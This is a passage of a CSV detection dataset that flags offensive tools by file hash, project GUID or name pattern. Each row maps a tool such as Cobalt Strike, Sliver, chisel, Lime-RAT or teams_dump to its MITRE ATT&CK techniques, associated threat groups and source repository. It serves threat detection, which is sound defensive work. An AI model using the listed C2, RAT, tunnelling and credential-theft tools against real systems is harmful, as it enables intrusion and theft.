Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35413"
"*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35414"
"*bbtfr/evil-proxy*",".{0,1000}bbtfr\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","35415"
"*bbypassuac*",".{0,1000}bbypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35416"
"*bc01c98fcd3e3bcf836254ba2ea39813c9129c342a609fc8c9dfc59b94f0a2f6*",".{0,1000}bc01c98fcd3e3bcf836254ba2ea39813c9129c342a609fc8c9dfc59b94f0a2f6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35417"
"*bc039376443ab3eebc8b1f876e47c19fc2cd74a9417f7c8cb75d5b0c090f87d7*",".{0,1000}bc039376443ab3eebc8b1f876e47c19fc2cd74a9417f7c8cb75d5b0c090f87d7.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35418"
"*bc051b7ae14e30935c4cc0090a944f420fa69cbcf66469038af5a306030b9007*",".{0,1000}bc051b7ae14e30935c4cc0090a944f420fa69cbcf66469038af5a306030b9007.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","35420"
"*bc0ede720752c8c47e5ae348c16efd9c52668f6267f1118e3f5af0ee22741beb*",".{0,1000}bc0ede720752c8c47e5ae348c16efd9c52668f6267f1118e3f5af0ee22741beb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35421"
"*bc0ff8a55724a6ac40a71ca1b0072e40c34e80c13c26688860fdf3c4e5309f25*",".{0,1000}bc0ff8a55724a6ac40a71ca1b0072e40c34e80c13c26688860fdf3c4e5309f25.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35422"
"*bc10e4d6dd01c0d941795e6084bac19a8ce38c5b581523845a748e56579cce00*",".{0,1000}bc10e4d6dd01c0d941795e6084bac19a8ce38c5b581523845a748e56579cce00.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","35423"
"*bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e*",".{0,1000}bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","35424"
"*bc160ae1d1dbef0c815e3ed63f873b3e753e4d5e950af24c76b08fef5be4c7b4*",".{0,1000}bc160ae1d1dbef0c815e3ed63f873b3e753e4d5e950af24c76b08fef5be4c7b4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35425"
"*bc1d04a56e801f0a7a5e3488f930a485e8c63eafa80e89444ff63ac81f5a90cb*",".{0,1000}bc1d04a56e801f0a7a5e3488f930a485e8c63eafa80e89444ff63ac81f5a90cb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35427"
"*bc2502f347b077bc5d332192e25a696c072314503ad10b6573c483fd61f9d4cb*",".{0,1000}bc2502f347b077bc5d332192e25a696c072314503ad10b6573c483fd61f9d4cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35428"
"*bc25b38d07d2dbc8c7d9491a0779dcfaf87ea69ce078900ed61d307f45da33c3*",".{0,1000}bc25b38d07d2dbc8c7d9491a0779dcfaf87ea69ce078900ed61d307f45da33c3.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","35429"
"*bc2a86638dcca2986c5099d1145af207a0e237815b29a9f727e39894c15ef4eb*",".{0,1000}bc2a86638dcca2986c5099d1145af207a0e237815b29a9f727e39894c15ef4eb.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","35431"
"*bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed*",".{0,1000}bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35432"
"*bc2ef0da409c8c1a026e13d11b4cf32995e4a7e742c097ca9d1594aba8d3d4e3*",".{0,1000}bc2ef0da409c8c1a026e13d11b4cf32995e4a7e742c097ca9d1594aba8d3d4e3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35433"
"*bc3023b36063a7681db24681472b54fa11f0d4ec*",".{0,1000}bc3023b36063a7681db24681472b54fa11f0d4ec.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35434"
"*bc32ae3ef3f8dc5a7c4b4ce19bc8dddc830e6c59d655d98bf178a4a239bde38b*",".{0,1000}bc32ae3ef3f8dc5a7c4b4ce19bc8dddc830e6c59d655d98bf178a4a239bde38b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35435"
"*bc379f273189510c10ca5c473ca78ce246ac734ec6a376bdca7e0ddfa09804f7*",".{0,1000}bc379f273189510c10ca5c473ca78ce246ac734ec6a376bdca7e0ddfa09804f7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35437"
"*bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a*",".{0,1000}bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","35439"
"*bc4657ac480d1f46349254c1d217dba4725fe54bbfa5fe7492c6a1bf1c6afebe*",".{0,1000}bc4657ac480d1f46349254c1d217dba4725fe54bbfa5fe7492c6a1bf1c6afebe.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","#filehash","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","35441"
"*bc511e38827372f9bbfcd48fd448c51c0051f7cb64a91b2b4d0208a4dade3d22*",".{0,1000}bc511e38827372f9bbfcd48fd448c51c0051f7cb64a91b2b4d0208a4dade3d22.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","35442"
"*bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5*",".{0,1000}bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35443"
"*bc600d653659564adc9f526dbba502d0b2fa47c82192b0c14fd25f45d81eec6d*",".{0,1000}bc600d653659564adc9f526dbba502d0b2fa47c82192b0c14fd25f45d81eec6d.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35444"
"*bc6e01140eef4c7579635f731aea2b4658c733f25dae67a3f56fee8316151a27*",".{0,1000}bc6e01140eef4c7579635f731aea2b4658c733f25dae67a3f56fee8316151a27.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35446"
"*bc6fbafaafa92286c70e56a47a47281e3621dc6a0e606540e9e2ba34db51e21c*",".{0,1000}bc6fbafaafa92286c70e56a47a47281e3621dc6a0e606540e9e2ba34db51e21c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35447"
"*bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce*",".{0,1000}bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35448"
"*bc737503f81a21c41b39c2ebcf25949d9012af6efa31d1bf305d0cafe46da136*",".{0,1000}bc737503f81a21c41b39c2ebcf25949d9012af6efa31d1bf305d0cafe46da136.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","35449"
"*BC74B071-B36A-4EE8-8F03-5CF0A02C32DA*",".{0,1000}BC74B071\-B36A\-4EE8\-8F03\-5CF0A02C32DA.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","35450"
"*bc791951b9137e1d891721b95f21d5414e1d792813b976547d3f58a745023797*",".{0,1000}bc791951b9137e1d891721b95f21d5414e1d792813b976547d3f58a745023797.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35452"
"*bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a*",".{0,1000}bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35453"
"*bc7f0c671c1035f9af93b7b657005fbc4807deef8071bc58bf310f821cf67944*",".{0,1000}bc7f0c671c1035f9af93b7b657005fbc4807deef8071bc58bf310f821cf67944.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35455"
"*bc878fdcd73cf4ee6dd19e0af9d85cae49a96862da17936f079c240e362f2787*",".{0,1000}bc878fdcd73cf4ee6dd19e0af9d85cae49a96862da17936f079c240e362f2787.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35458"
"*bc887f2d746cb1605a42773ba27c00865d2ba1e7a3ee091b91cdb7f581b7f7fb*",".{0,1000}bc887f2d746cb1605a42773ba27c00865d2ba1e7a3ee091b91cdb7f581b7f7fb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35460"
"*bc991b30cee4be589d540e1d0f055d62072843cbe1b95b27f40b860dc5aef935*",".{0,1000}bc991b30cee4be589d540e1d0f055d62072843cbe1b95b27f40b860dc5aef935.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35462"
"*bc99c9d2b150645abdb37d35c032dab28f5995d505294b0bd2c633525c91c4b0*",".{0,1000}bc99c9d2b150645abdb37d35c032dab28f5995d505294b0bd2c633525c91c4b0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35463"
"*BC9BC3C3-4FBC-4F36-866C-AC2B4758BEBE*",".{0,1000}BC9BC3C3\-4FBC\-4F36\-866C\-AC2B4758BEBE.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","35464"
"*bc9c9c452084648c29a0ce2b6457b0ddf03bf4f63d939797b10eabb4b470e31b*",".{0,1000}bc9c9c452084648c29a0ce2b6457b0ddf03bf4f63d939797b10eabb4b470e31b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35465"
"*bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164*",".{0,1000}bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35466"
"*bca5760a0654e457801cbc90c173703da7b359376a5c8855d1e7bd451a0e421b*",".{0,1000}bca5760a0654e457801cbc90c173703da7b359376a5c8855d1e7bd451a0e421b.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35469"
"*bca7426a0e36d0d3066811d3e372c8599650eabaed51495aac776c9a28cff99e*",".{0,1000}bca7426a0e36d0d3066811d3e372c8599650eabaed51495aac776c9a28cff99e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","35470"
"*bcaea27cde09d870a66d227e61d4be463e0d943831c8728612489b0587e34676*",".{0,1000}bcaea27cde09d870a66d227e61d4be463e0d943831c8728612489b0587e34676.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","35471"
